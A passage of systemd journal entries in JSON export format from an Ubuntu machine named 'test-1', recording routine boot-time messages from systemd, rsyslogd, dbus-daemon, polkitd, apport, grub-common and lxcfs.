: "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-config availability.", "UNIT" : "cloud-config.target", "INVOCATION_ID" : "6c409315f2ba4f0f91c56317ab4bf1d9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817907846" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2db;b=e2b08827b5804427b422c10c84f1567e;m=2a5e441;t=5bd16df6963a9;x=274d74540f94b061", "__REALTIME_TIMESTAMP" : "1615280818709417", "__MONOTONIC_TIMESTAMP" : "44426305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's userid changed to 102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301199" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dc;b=e2b08827b5804427b422c10c84f1567e;m=2a5e5a5;t=5bd16df69650c;x=f921319dbb3c7da1", "__REALTIME_TIMESTAMP" : "1615280818709772", "__MONOTONIC_TIMESTAMP" : "44426661", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target System Initialization.", "UNIT" : "sysinit.target", "INVOCATION_ID" : "8489ce32bede4baeaa643a785a33c2a1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817915640" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dd;b=e2b08827b5804427b422c10c84f1567e;m=2a5e61e;t=5bd16df696586;x=5c3f5f0781ff18d7", "__REALTIME_TIMESTAMP" : "1615280818709894", "__MONOTONIC_TIMESTAMP" : "44426782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : " [origin software=\"rsyslogd\" swVersion=\"8.32.0\" x-pid=\"783\" x-info=\"http://www.rsyslog.com\"] start", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301202" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2de;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=7cfa936fa298e955", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "MESSAGE" : " * Starting automatic crash report generation: apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2df;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=880efa6ed3af31bd", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e0;b=e2b08827b5804427b422c10c84f1567e;m=2a5e7fb;t=5bd16df696763;x=ca7481cda5aeaab1", "__REALTIME_TIMESTAMP" : "1615280818710371", "__MONOTONIC_TIMESTAMP" : "44427259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on UUID daemon activation socket.", "UNIT" : "uuidd.socket", "INVOCATION_ID" : "5e99b229418347f591bf5e5be417071b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817920686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e1;b=e2b08827b5804427b422c10c84f1567e;m=2a5e899;t=5bd16df696800;x=7b7d3b6d6b045b24", "__REALTIME_TIMESTAMP" : "1615280818710528", "__MONOTONIC_TIMESTAMP" : "44427417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "MESSAGE" : "client sent challenge to [https://entropy.ubuntu.com/]", "_PID" : "812", "_UID" : "110", "_GID" : "1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818308095" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e2;b=e2b08827b5804427b422c10c84f1567e;m=2a5eb55;t=5bd16df696abc;x=2f156472965a9002", "__REALTIME_TIMESTAMP" : "1615280818711228", "__MONOTONIC_TIMESTAMP" : "44428117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Socket activation for snappy daemon.", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817929481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e3;b=e2b08827b5804427b422c10c84f1567e;m=2a5ebba;t=5bd16df696b22;x=4966d0287197bbc5", "__REALTIME_TIMESTAMP" : "1615280818711330", "__MONOTONIC_TIMESTAMP" : "44428218", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "MESSAGE" : "[system] AppArmor D-Bus mediation is enabled", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818332886" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e4;b=e2b08827b5804427b422c10c84f1567e;m=2a5f395;t=5bd16df6972fc;x=cacb4ca893e9e258", "__REALTIME_TIMESTAMP" : "1615280818713340", "__MONOTONIC_TIMESTAMP" : "44430229", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Message of the Day.", "UNIT" : "motd-news.timer", "INVOCATION_ID" : "8863f0fafcad47bcad4c71fc9fa92ebd", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817940642" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e5;b=e2b08827b5804427b422c10c84f1567e;m=2a5f427;t=5bd16df69738f;x=de32ed590e437342", "__REALTIME_TIMESTAMP" : "1615280818713487", "__MONOTONIC_TIMESTAMP" : "44430375", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.hostname1' unit='dbus-org.freedesktop.hostname1.service' requested by ':1.0' (uid=100 pid=600 comm=\"/lib/systemd/systemd-networkd \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818337092" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e6;b=e2b08827b5804427b422c10c84f1567e;m=2a5f587;t=5bd16df6974ee;x=d0573be2806b787a", "__REALTIME_TIMESTAMP" : "1615280818713838", "__MONOTONIC_TIMESTAMP" : "44430727", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on D-Bus System Message Bus Socket.", "UNIT" : "dbus.socket", "INVOCATION_ID" : "8b5e9356754c4f3794b0647122801a1a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817945476" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e7;b=e2b08827b5804427b422c10c84f1567e;m=2a5f633;t=5bd16df69759b;x=d60627d30e6fb974", "__REALTIME_TIMESTAMP" : "1615280818714011", "__MONOTONIC_TIMESTAMP" : "44430899", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkit.service' requested by ':1.4' (uid=0 pid=786 comm=\"/usr/lib/accountsservice/accounts-daemon \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818366298" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e8;b=e2b08827b5804427b422c10c84f1567e;m=2a5f763;t=5bd16df6976cb;x=975c82288defccda", "__REALTIME_TIMESTAMP" : "1615280818714315", "__MONOTONIC_TIMESTAMP" : "44431203", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt download activities.", "UNIT" : "apt-daily.timer", "INVOCATION_ID" : "95548d7e62714445aee757aca3c79eb9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817951929" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e9;b=e2b08827b5804427b422c10c84f1567e;m=2a5f7ec;t=5bd16df697753;x=dba300a7ab8017ea", "__REALTIME_TIMESTAMP" : "1615280818714451", "__MONOTONIC_TIMESTAMP" : "44431340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "polkitd", "SYSLOG_PID" : "823", "MESSAGE" : "started daemon version 0.105 using authority implementation `local' version `0.105'", "_PID" : "823", "_COMM" : "polkitd", "_EXE" : "/usr/lib/policykit-1/polkitd", "_CMDLINE" : "/usr/lib/policykit-1/polkitd --no-debug", "_SYSTEMD_CGROUP" : "/system.slice/polkit.service", "_SYSTEMD_UNIT" : "polkit.service", "_SYSTEMD_INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552346" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ea;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=74aecea21f3d04f8", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "MESSAGE" : " * Recording successful boot for GRUB", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2eb;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=af6dda4d3d12f932", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ec;b=e2b08827b5804427b422c10c84f1567e;m=2a60023;t=5bd16df697f8b;x=17aed942f3125518", "__REALTIME_TIMESTAMP" : "1615280818716555", "__MONOTONIC_TIMESTAMP" : "44433443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt upgrade and clean activities.", "UNIT" : "apt-daily-upgrade.timer", "INVOCATION_ID" : "a52729bb66a64f499069fb0631cf1115", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817959873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ed;b=e2b08827b5804427b422c10c84f1567e;m=2a600ad;t=5bd16df698014;x=b194780a247cfb8e", "__REALTIME_TIMESTAMP" : "1615280818716692", "__MONOTONIC_TIMESTAMP" : "44433581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.PolicyKit1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552765" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ee;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=d09af9eacaa4a0f4", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "MESSAGE" : "mount namespace: 5", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ef;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=eeeec5f11f290678", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : "hierarchies:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f0;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=bc1ac33be7425c42", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 0: fd: 6: perf_event" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f1;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=28537ce1469cc4b2", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 1: fd: 7: pids" } { "__CURSOR" : 